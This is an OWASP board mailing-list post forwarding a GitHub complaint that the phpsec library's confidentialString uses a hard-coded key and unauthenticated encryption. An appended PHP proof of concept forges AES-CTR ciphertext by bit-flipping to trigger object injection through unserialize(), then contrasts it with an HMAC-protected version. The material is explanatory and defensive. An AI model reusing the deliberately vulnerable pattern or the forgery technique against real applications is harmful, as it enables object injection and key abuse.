[Owasp-board] Fwd: [phpsec] confidentialString function uses hard-coded key (#108)
johanna curiel curiel
johanna.curiel at owasp.org
Wed Nov 25 15:47:27 UTC 2015
This is why higher criteria and revision are needed for the defender library.
See the user's comment.
---------- Forwarded message ----------
From: Scott <notifications at github.com>
Date: Wed, Nov 25, 2015 at 11:14 AM
Subject: Re: [phpsec] confidentialString function uses hard-coded key (#108)
To: OWASP/phpsec <phpsec at noreply.github.com>
Cc: owaspjocur <johanna.curiel at owasp.org>
Oh my god OWASP, why are you shipping your own broken cryptography library?
Hey, I heard you like PHP Object Injection from chosen-ciphertext attacks,
because you're not authenticating your ciphertext at all.
I really hope nobody uses this, and instead opts for a sane authenticated
encryption library, such as defuse/php-encryption
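The attack Scott's comment alludes to, as an added illustration written for this thread (not code from OWASP/phpsec or from the commenter): a ciphertext that is encrypted but never authenticated can be rewritten byte by byte by anyone who knows (or guesses) the plaintext, and if the application hands the decrypted bytes to unserialize(), that rewrite becomes PHP Object Injection. Everything below is an assumption, not a description of phpsec: the cipher mode (AES-256-CTR, a stream mode, so a bit flip in the ciphertext flips the same bit in the plaintext; CBC is also malleable, garbling one block while flipping the next), the key values, the function names confidential_encrypt/confidential_decrypt and authenticated_encrypt/authenticated_decrypt, and the hypothetical gadget class AuditLog.

```php
<?php
// Illustration added to this thread; not the phpsec library's code.
// Assumptions: an unauthenticated mode (AES-256-CTR chosen here) and a
// caller that passes the decrypted string to unserialize().
declare(strict_types=1);

// Hypothetical gadget: any class already loaded by the application whose
// __wakeup()/__destruct() has a side effect. Here it only records an event.
final class AuditLog
{
    public static array $events = [];

    public function __wakeup(): void
    {
        self::$events[] = 'AuditLog::__wakeup ran from attacker-controlled ciphertext';
    }
}

// "Hard-coded" keys, as in the issue title (values are made up for this demo).
const KEY     = '0123456789abcdef0123456789abcdef'; // 32 bytes for AES-256
const MAC_KEY = 'fedcba9876543210fedcba9876543210'; // separate key for the MAC

// --- vulnerable pattern: encryption only, nothing binds the ciphertext ------
function confidential_encrypt(string $plain): string
{
    $iv = random_bytes(16);
    $ct = openssl_encrypt($plain, 'aes-256-ctr', KEY, OPENSSL_RAW_DATA, $iv);
    return $iv . $ct;
}

function confidential_decrypt(string $blob): string
{
    $iv = substr($blob, 0, 16);
    $ct = substr($blob, 16);
    return openssl_decrypt($ct, 'aes-256-ctr', KEY, OPENSSL_RAW_DATA, $iv);
}

// --- hardened pattern: encrypt-then-MAC, tag checked before any decryption --
function authenticated_encrypt(string $plain): string
{
    $blob = confidential_encrypt($plain);
    return $blob . hash_hmac('sha256', $blob, MAC_KEY, true);
}

function authenticated_decrypt(string $blob): ?string
{
    if (strlen($blob) < 16 + 32) {
        return null;
    }
    $body = substr($blob, 0, -32);
    $tag  = substr($blob, -32);
    $expected = hash_hmac('sha256', $body, MAC_KEY, true);
    if (!hash_equals($expected, $tag)) {
        return null; // tampered: the caller never sees, let alone unserializes, a plaintext
    }
    return confidential_decrypt($body);
}

// --- the attack -------------------------------------------------------------
// Known plaintext: the application stored a serialized string.
$known = serialize('hello world');   // s:11:"hello world";  (19 bytes)
// Attacker-chosen serialized object of exactly the same length.
$evil  = 'O:8:"AuditLog":0:{}';       // 19 bytes
assert(strlen($known) === strlen($evil));

$blob = confidential_encrypt($known);
$iv   = substr($blob, 0, 16);
$ct   = substr($blob, 16);
// Stream-cipher malleability: (C xor P xor P') decrypts to P' under the same IV.
$forged = $iv . ($ct ^ $known ^ $evil);

// Vulnerable path: decryption cannot tell, and unserialize() builds the gadget,
// so AuditLog::__wakeup() runs and AuditLog::$events gains an entry.
$obj = unserialize(confidential_decrypt($forged), ['allowed_classes' => true]);
var_dump($obj instanceof AuditLog, AuditLog::$events);

// With the key hard-coded in the source, the attacker does not even need the
// known-plaintext trick: they can produce a valid blob for $evil directly.
$forgedDirect = confidential_encrypt($evil);
var_dump(confidential_decrypt($forgedDirect) === $evil);

// Hardened path: the same bit flip against an authenticated blob fails the
// HMAC check, so authenticated_decrypt() returns null and unserialize() is
// never reached. An untampered blob still round-trips.
$ablob   = authenticated_encrypt($known);
$aforged = substr($ablob, 0, 16)
         . (substr($ablob, 16, 19) ^ $known ^ $evil)
         . substr($ablob, 35);
var_dump(authenticated_decrypt($aforged));
var_dump(authenticated_decrypt($ablob) === $known);
```

Two practical checks fall out of this. First, the MAC must cover the IV and the whole ciphertext and be verified with hash_equals() before a single byte is decrypted; a MAC computed over the plaintext, or checked after decryption, still lets the malleable ciphertext reach the decryptor. Second, a hard-coded key turns the library's own encrypt function into a forgery oracle for anyone who can read the source, so no amount of authentication repairs issue #108 on its own. A maintained library such as the defuse/php-encryption mentioned in the comment, or PHP's sodium_crypto_secretbox(), handles both the per-message key handling and the authentication so that application code never has to.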